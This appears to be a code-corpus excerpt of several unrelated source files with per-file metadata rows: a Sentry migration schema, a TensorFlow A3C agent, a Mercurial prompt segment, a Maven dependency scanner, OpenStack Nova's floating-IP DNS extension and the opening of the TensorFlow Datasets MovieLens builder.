'sentry.timeseriessnapshot': {
'Meta': {'unique_together': '()', 'object_name': 'TimeSeriesSnapshot', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'end': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'period': ('django.db.models.fields.IntegerField', [], {}),
'start': ('django.db.models.fields.DateTimeField', [], {}),
'values': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'sentry.db.models.fields.array.ArrayField', [], {'null': 'True'})})
},
'sentry.user': {
'Meta': {'unique_together': '()', 'object_name': 'User', 'db_table': "'auth_user'", 'index_together': '()'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_password_expired': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_sentry_app': ('django.db.models.fields.NullBooleanField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'last_password_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_column': "'first_name'", 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'session_nonce': ('django.db.models.fields.CharField', [], {'max_length': '12', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'})
},
'sentry.useravatar': {
'Meta': {'unique_together': '()', 'object_name': 'UserAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.User']"})
},
'sentry.useremail': {
'Meta': {'unique_together': "(('user', 'email'),)", 'object_name': 'UserEmail', 'index_together': '()'},
'date_hash_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_verified': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'emails'", 'to': "orm['sentry.User']"}),
'validation_hash': ('django.db.models.fields.CharField', [], {'default': "u'tfq6tE9Duz48Ehl7NuSBrIVlGLs4yM09'", 'max_length': '32'})
},
'sentry.userip': {
'Meta': {'unique_together': "(('user', 'ip_address'),)", 'object_name': 'UserIP', 'index_together': '()'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.GenericIPAddressField', [], {'max_length': '39'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'region_code': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.useroption': {
'Meta': {'unique_together': "(('user', 'project', 'key'), ('user', 'organization', 'key'))", 'object_name': 'UserOption', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']", 'null': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.userpermission': {
'Meta': {'unique_together': "(('user', 'permission'),)", 'object_name': 'UserPermission', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'permission': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.userreport': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'UserReport', 'index_together': "(('project', 'event_id'), ('project', 'date_added'))"},
'comments': ('django.db.models.fields.TextField', [], {}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}),
'environment': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Environment']", 'null': 'True'}),
'event_id': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_user_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.widget': {
'Meta': {'unique_together': "(('dashboard', 'order'), ('dashboard', 'title'))", 'object_name': 'Widget', 'index_together': '()'},
'dashboard': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Dashboard']"}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_options': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'display_type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'sentry.widgetdatasource': {
'Meta': {'unique_together': "(('widget', 'name'), ('widget', 'order'))", 'object_name': 'WidgetDataSource', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'order': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'widget': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Widget']"})
}
}
complete_apps = ['sentry']
| bsd-3-clause | 6,805,013,253,530,824,000 | 94.341226 | 234 | 0.580177 | false |
AlphaSmartDog/DeepLearningNotes | Note-6 A3CNet/Note-6.4 HS300指数增强/agent/agent.py | 1 | 6362 | import numpy as np
import tensorflow as tf
from agent.forward import ActorCriticNet
from params import *
def batch_choice(a, p):
action_list = [np.random.choice(a, p=i) for i in p]
return np.array(action_list)
# local network for advantage actor-critic which are also know as A2C
class Agent(object):
def __init__(self, name, access, inputs_shape, action_size):
self.Access = access
self.action_size = action_size
batch_size = inputs_shape[0]
self.batch_size = batch_size
with tf.variable_scope(name):
# placeholder
# [Time, Batch, Rows, Columns, Channels]
self.inputs = tf.placeholder(
tf.float32, [None] + inputs_shape, 'inputs')
# fix
inputs = tf.expand_dims(self.inputs, axis=-1)
# [T_MAX, Batch]
self.actions = tf.placeholder(
tf.int32, [None, batch_size], "actions")
# [T_MAX]
self.targets = tf.placeholder(
tf.float32, [None], "discounted_rewards")
self.gathers = tf.placeholder(
tf.int32, [None], 'gather_list')
# build network and adjust output probability
self.net = ActorCriticNet('AC-' + name)
policy, value = self.net(inputs, action_size)
policy = tf.clip_by_value(
policy, CLIP_MIN, CLIP_MAX, 'constraint')
# interface gather and step
# [Time, Batch, action_size] -> [T_MAX, Batch, action_size]
self.policy = tf.gather(policy, self.gathers)
self.value = tf.gather(value, self.gathers) # [T_MAX]
self.value = tf.squeeze(self.value, axis=1)
self.policy_step = policy[-1] # [Batch, action_size]
self.value_step = value[-1] # 1
# build other function
self._build_losses()
self._build_async_swap()
self._build_interface()
print('graph %s' % (str(name)))
def _build_losses(self):
# value loss
self.advantage = self.targets - self.value # [T_MAX]
value_loss = 0.5 * tf.square(self.advantage)
# policy loss
# [T_MAX, Batch, action_size] -> [T_MAX, Batch]
policy_action = tf.reduce_sum(
self.policy * tf.one_hot(self.actions, self.action_size), axis=2)
# [T_MAX, Batch]
policy_loss = -tf.log(policy_action) * tf.stop_gradient(
tf.expand_dims(self.advantage, axis=1))
# entropy loss [T_MAX, Batch]
entropy_loss = tf.reduce_sum(self.policy * tf.log(self.policy), axis=2)
# total loss
self.critic_loss = tf.reduce_mean(value_loss)
self.actor_loss = tf.reduce_mean(policy_loss + entropy_loss * ENTROPY_BETA)
self.total_loss = self.critic_loss + self.actor_loss
# interface
self.a_total_loss = self.total_loss
self.a_entropy_loss = tf.reduce_mean(entropy_loss)
self.a_policy_loss = tf.reduce_mean(policy_loss)
self.a_value_loss = tf.reduce_mean(value_loss)
self.a_critic_loss = self.critic_loss
self.a_actor_loss = self.actor_loss
self.a_advantage = tf.reduce_mean(self.advantage)
self.a_value_mean = tf.reduce_mean(self.value)
self.a_policy_mean = tf.reduce_mean(self.policy)
def _build_async_swap(self):
# Get gradients from local network using local losses
local_vars = self.get_trainable()
self.gradients = tf.gradients(self.total_loss, local_vars)
# Clip gradients
grads, self.global_norm = tf.clip_by_global_norm(
self.gradients, MAX_GRAD_NORM)
# Update global network
# Apply local gradients to global network
global_vars = self.Access.get_trainable()
self.update_global = self.Access.optimizer.apply_gradients(
zip(grads, global_vars))
# Update local network
assign_list = []
for gv, lv in zip(global_vars, local_vars):
assign_list.append(tf.assign(lv, gv))
self.update_local = assign_list
def _build_interface(self):
self.a_interface = [self.a_total_loss,
self.a_entropy_loss,
self.a_policy_loss,
self.a_value_loss,
self.a_actor_loss,
self.a_critic_loss,
self.a_advantage,
self.a_value_mean,
self.a_policy_mean,
self.a_advantage]
def get_trainable(self):
return list(self.net.get_variables())
def init_or_update_local(self, sess):
sess.run(self.update_local)
def get_step_policy(self, sess, inputs):
return sess.run(self.policy_step, {self.inputs: inputs})
def get_step_value(self, sess, inputs):
return sess.run(self.value_step, {self.inputs: inputs})
def get_losses(self, sess, inputs, actions, targets, gather_list):
"""
get all loss functions of network
:param sess:
:param inputs:
:param actions:
:param targets:
:return:
"""
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gather_list}
return sess.run(self.a_interface, feed_dict)
def train_step(self, sess, inputs, actions, targets, gathers):
feed_dict = {self.inputs: inputs,
self.actions: actions,
self.targets: targets,
self.gathers: gathers}
sess.run(self.update_global, feed_dict)
# get stochastic action for train
def get_stochastic_action(self, sess, inputs, epsilon=0.9):
if np.random.uniform() < epsilon:
policy = sess.run(self.policy_step, {self.inputs: inputs})
return batch_choice(self.action_size, policy)
else:
return np.random.randint(self.action_size, size=self.batch_size)
# get deterministic action for test
def get_deterministic_policy_action(self, sess, inputs):
policy_step = sess.run(self.policy_step, {self.inputs: inputs})
return np.argmax(policy_step, axis=1)
| mit | -5,111,055,656,513,035,000 | 37.095808 | 83 | 0.568375 | false |
saghul/shline | segments/hg.py | 1 | 1578 |
def add_hg_segment():
import os
import subprocess
env = {"LANG": "C", "HOME": os.getenv("HOME")}
def get_hg_status():
has_modified_files = False
has_untracked_files = False
has_missing_files = False
try:
output = subprocess.check_output(['hg', 'status'], env=env)
except subprocess.CalledProcessError:
pass
else:
for line in output.split('\n'):
if line == '':
continue
elif line[0] == '?':
has_untracked_files = True
elif line[0] == '!':
has_missing_files = True
else:
has_modified_files = True
return has_modified_files, has_untracked_files, has_missing_files
try:
output = subprocess.check_output(['hg', 'branch'], env=env)
except (subprocess.CalledProcessError, OSError):
return
branch = output.rstrip()
if not branch:
return
bg = Color.REPO_CLEAN_BG
fg = Color.REPO_CLEAN_FG
has_modified_files, has_untracked_files, has_missing_files = get_hg_status()
if has_modified_files or has_untracked_files or has_missing_files:
bg = Color.REPO_DIRTY_BG
fg = Color.REPO_DIRTY_FG
extra = ''
if has_untracked_files:
extra += '+'
if has_missing_files:
extra += '!'
branch += (' ' + extra if extra != '' else '')
return shline.append(' %s %s ' % (shline.branch, branch), fg, bg)
add_hg_segment()
| mit | -5,181,100,140,301,123,000 | 29.346154 | 80 | 0.529151 | false |
tpflueger/CSCI4900 | scripts/main.py | 1 | 1140 | # SPDX-License-Identifier: MIT
'''Usage:
{0} scan (FILE)
{0} dependencies (JARNAME)
{0} (--help | --version)
Arguments:
scan Scan pom file for dependencies
dependencies Show dependency tree for jarFile
'''
import shutil
import sys
import os
from dependency_reader import DependencyReader
from docopt import docopt
__version__ = '1.0.0'
def main():
argv = docopt(
doc=__doc__.format(os.path.basename(sys.argv[0])),
argv=sys.argv[1:],
version=__version__
)
dependencyReader = DependencyReader()
if argv['scan']:
dependencyReader.getPom(os.path.abspath(argv['FILE']))
dependencyReader.getDependencies()
dependencyReader.relateDependencies()
dependencyReader.scanDependencies()
dependencyReader.createRelationships()
dependencyReader.retrieve_dependencies(None)
shutil.rmtree(dependencyReader.tempDirectoryPath)
elif argv['dependencies']:
dependencyReader.retrieve_dependencies(argv['JARNAME'])
shutil.rmtree(dependencyReader.tempDirectoryPath)
if __name__ == "__main__":
sys.exit(main())
| mit | -7,091,659,358,233,557,000 | 27.5 | 63 | 0.670175 | false |
NoBodyCam/TftpPxeBootBareMetal | nova/api/openstack/compute/contrib/floating_ip_dns.py | 1 | 10842 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License
import urllib
import webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import exception
from nova import network
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'floating_ip_dns')
def make_dns_entry(elem):
elem.set('id')
elem.set('ip')
elem.set('type')
elem.set('domain')
elem.set('name')
def make_domain_entry(elem):
elem.set('domain')
elem.set('scope')
elem.set('project')
elem.set('availability_zone')
class FloatingIPDNSTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entry',
selector='dns_entry')
make_dns_entry(root)
return xmlutil.MasterTemplate(root, 1)
class FloatingIPDNSsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('dns_entries')
elem = xmlutil.SubTemplateElement(root, 'dns_entry',
selector='dns_entries')
make_dns_entry(elem)
return xmlutil.MasterTemplate(root, 1)
class DomainTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entry',
selector='domain_entry')
make_domain_entry(root)
return xmlutil.MasterTemplate(root, 1)
class DomainsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('domain_entries')
elem = xmlutil.SubTemplateElement(root, 'domain_entry',
selector='domain_entries')
make_domain_entry(elem)
return xmlutil.MasterTemplate(root, 1)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSDomainController, self).__init__()
@wsgi.serializers(xml=DomainsTemplate)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
domains = self.network_api.get_dns_domains(context)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@wsgi.serializers(xml=DomainTemplate)
def update(self, req, id, body):
"""Add or modify domain entry"""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
if (scope not in ('private', 'public') or
project and av_zone or
scope == 'private' and project or
scope == 'public' and av_zone):
raise webob.exc.HTTPUnprocessableEntity()
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
def delete(self, req, id):
"""Delete the domain identified by id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API"""
def __init__(self):
self.network_api = network.API()
super(FloatingIPDNSEntryController, self).__init__()
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
entry = _create_dns_entry(entries[0], name, domain)
return _translate_dns_entry_view(entry)
@wsgi.serializers(xml=FloatingIPDNSsTemplate)
def index(self, req, domain_id):
"""Return a list of dns entries for the specified domain and ip."""
context = req.environ['nova.context']
authorize(context)
params = req.GET
floating_ip = params.get('ip')
domain = _unquote_domain(domain_id)
if not floating_ip:
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
return _translate_dns_entries_view(entrylist)
@wsgi.serializers(xml=FloatingIPDNSTemplate)
def update(self, req, domain_id, id, body):
"""Add or modify dns entry"""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
entries = self.network_api.get_dns_entries_by_name(context,
name, domain)
if not entries:
# create!
self.network_api.add_dns_entry(context, address, name,
dns_type, domain)
else:
# modify!
self.network_api.modify_dns_entry(context, name, address, domain)
return _translate_dns_entry_view({'ip': address,
'name': name,
'type': dns_type,
'domain': domain})
def delete(self, req, domain_id, id):
"""Delete the entry identified by req and id. """
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
self.network_api.delete_dns_entry(context, name, domain)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=unicode(e))
return webob.Response(status_int=202)
class Floating_ip_dns(extensions.ExtensionDescriptor):
"""Floating IP DNS support"""
name = "Floating_ip_dns"
alias = "os-floating-ip-dns"
namespace = "http://docs.openstack.org/ext/floating_ip_dns/api/v1.1"
updated = "2011-12-23T00:00:00+00:00"
def __init__(self, ext_mgr):
self.network_api = network.API()
super(Floating_ip_dns, self).__init__(ext_mgr)
def get_resources(self):
resources = []
res = extensions.ResourceExtension('os-floating-ip-dns',
FloatingIPDNSDomainController())
resources.append(res)
res = extensions.ResourceExtension('entries',
FloatingIPDNSEntryController(),
parent={'member_name': 'domain',
'collection_name': 'os-floating-ip-dns'})
resources.append(res)
return resources
| apache-2.0 | 3,639,136,114,536,705,000 | 34.547541 | 78 | 0.590481 | false |
tensorflow/datasets | tensorflow_datasets/structured/movielens.py | 1 | 17907 | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MovieLens dataset."""
import os
import textwrap
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple
from absl import logging
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.structured import movielens_parsing
_CITATION = """
@article{10.1145/2827872,
author = {Harper, F. Maxwell and Konstan, Joseph A.},
title = {The MovieLens Datasets: History and Context},
year = {2015},
issue_date = {January 2016},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
volume = {5},
number = {4},
issn = {2160-6455},
url = {https://doi.org/10.1145/2827872},
doi = {10.1145/2827872},
journal = {ACM Trans. Interact. Intell. Syst.},
month = dec,
articleno = {19},
numpages = {19},
keywords = {Datasets, recommendations, ratings, MovieLens}
}
"""
_DESCRIPTION = """
This dataset contains a set of movie ratings from the MovieLens website, a movie
recommendation service. This dataset was collected and maintained by [GroupLens]
(https://grouplens.org/), a research group at the University of Minnesota. There
are 5 versions included: "25m", "latest-small", "100k", "1m", "20m". In all
datasets, the movies data and ratings data are joined on "movieId". The 25m
dataset, latest-small dataset, and 20m dataset contain only movie data and
rating data. The 1m dataset and 100k dataset contain demographic data in
addition to movie and rating data.
- "25m": This is the latest stable version of the MovieLens dataset. It is
recommended for research purposes.
- "latest-small": This is a small subset of the latest version of the MovieLens
dataset. It is changed and updated over time by GroupLens.
- "100k": This is the oldest version of the MovieLens datasets. It is a small
dataset with demographic data.
- "1m": This is the largest MovieLens dataset that contains demographic data.
- "20m": This is one of the most used MovieLens datasets in academic papers
along with the 1m dataset.
For each version, users can view either only the movies data by adding the
"-movies" suffix (e.g. "25m-movies") or the ratings data joined with the movies
data (and users data in the 1m and 100k datasets) by adding the "-ratings"
suffix (e.g. "25m-ratings").
The features below are included in all versions with the "-ratings" suffix.
- "movie_id": a unique identifier of the rated movie
- "movie_title": the title of the rated movie with the release year in
parentheses
- "movie_genres": a sequence of genres to which the rated movie belongs
- "user_id": a unique identifier of the user who made the rating
- "user_rating": the score of the rating on a five-star scale
- "timestamp": the timestamp of the ratings, represented in seconds since
midnight Coordinated Universal Time (UTC) of January 1, 1970
The "100k-ratings" and "1m-ratings" versions in addition include the following
demographic features.
- "user_gender": gender of the user who made the rating; a true value
corresponds to male
- "bucketized_user_age": bucketized age values of the user who made the rating,
the values and the corresponding ranges are:
- 1: "Under 18"
- 18: "18-24"
- 25: "25-34"
- 35: "35-44"
- 45: "45-49"
- 50: "50-55"
- 56: "56+"
- "user_occupation_label": the occupation of the user who made the rating
represented by an integer-encoded label; labels are preprocessed to be
consistent across different versions
- "user_occupation_text": the occupation of the user who made the rating in
the original string; different versions can have different set of raw text
labels
- "user_zip_code": the zip code of the user who made the rating
In addition, the "100k-ratings" dataset would also have a feature "raw_user_age"
which is the exact ages of the users who made the rating
Datasets with the "-movies" suffix contain only "movie_id", "movie_title", and
"movie_genres" features.
"""
_FORMAT_VERSIONS = ['25m', 'latest-small', '20m', '100k', '1m']
_TABLE_OPTIONS = ['movies', 'ratings']
class MovieLensConfig(tfds.core.BuilderConfig):
"""BuilderConfig for MovieLens dataset."""
def __init__(self,
format_version: Optional[str] = None,
table_option: Optional[str] = None,
download_url: Optional[str] = None,
parsing_fn: Optional[Callable[[str], Iterator[Tuple[int, Dict[
str, Any]]],]] = None,
**kwargs) -> None:
"""Constructs a MovieLensConfig.
Args:
format_version: a string to identify the format of the dataset, one of
'_FORMAT_VERSIONS'.
table_option: a string to identify the table to expose, one of
'_TABLE_OPTIONS'.
download_url: a string url for downloading the dataset.
parsing_fn: a callable for parsing the data.
**kwargs: keyword arguments forwarded to super.
Raises:
ValueError: if format_version is not one of '_FORMAT_VERSIONS' or if
table_option is not one of '_TABLE_OPTIONS'.
"""
if format_version not in _FORMAT_VERSIONS:
raise ValueError('format_version must be one of %s.' % _FORMAT_VERSIONS)
if table_option not in _TABLE_OPTIONS:
raise ValueError('table_option must be one of %s.' % _TABLE_OPTIONS)
super(MovieLensConfig, self).__init__(**kwargs)
self._format_version = format_version
self._table_option = table_option
self._download_url = download_url
self._parsing_fn = parsing_fn
@property
def format_version(self) -> str:
return self._format_version
@property
def table_option(self) -> str:
return self._table_option
@property
def download_url(self) -> str:
return self._download_url
@property
def parsing_fn(
self) -> Optional[Callable[[str], Iterator[Tuple[int, Dict[str, Any]]],]]:
return self._parsing_fn
class Movielens(tfds.core.GeneratorBasedBuilder):
"""MovieLens rating dataset."""
BUILDER_CONFIGS = [
MovieLensConfig(
name='25m-ratings',
description=textwrap.dedent("""\
This dataset contains 25,000,095 ratings across 62,423 movies,
created by 162,541 users between January 09, 1995 and November 21,
2019. This dataset is the latest stable version of the MovieLens
dataset, generated on November 21, 2019.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='25m',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='25m-movies',
description=textwrap.dedent("""\
This dataset contains data of 62,423 movies rated in the 25m
dataset."""),
version='0.1.0',
format_version='25m',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-25m.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
# The latest-small dataset is changed over time. Its checksum might need
# updating in the future.
MovieLensConfig(
name='latest-small-ratings',
description=textwrap.dedent("""\
This dataset contains 100,836 ratings across 9,742 movies, created
by 610 users between March 29, 1996 and September 24, 2018. This
dataset is generated on September 26, 2018 and is the a subset of
the full latest version of the MovieLens dataset. This dataset
is changed and updated over time.
Each user has rated at least 20 movies. The ratings are in
half-star increments. This dataset does not include demographic
data."""),
version='0.1.0',
format_version='latest-small',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_ratings_data,
),
MovieLensConfig(
name='latest-small-movies',
description=textwrap.dedent("""\
This dataset contains data of 9,742 movies rated in the
latest-small dataset."""),
version='0.1.0',
format_version='latest-small',
table_option='movies',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-latest-small.zip'),
parsing_fn=movielens_parsing.parse_current_movies_data,
),
MovieLensConfig(
name='100k-ratings',
description=textwrap.dedent("""\
This dataset contains 100,000 ratings from 943 users on 1,682
movies. This dataset is the oldest version of the MovieLens
dataset.
Each user has rated at least 20 movies. Ratings are in whole-star
increments. This dataset contains demographic data of users in
addition to data on movies and ratings."""),
version='0.1.0',
format_version='100k',
table_option='ratings',
download_url=('http://files.grouplens.org/datasets/movielens/'
'ml-100k.zip'),
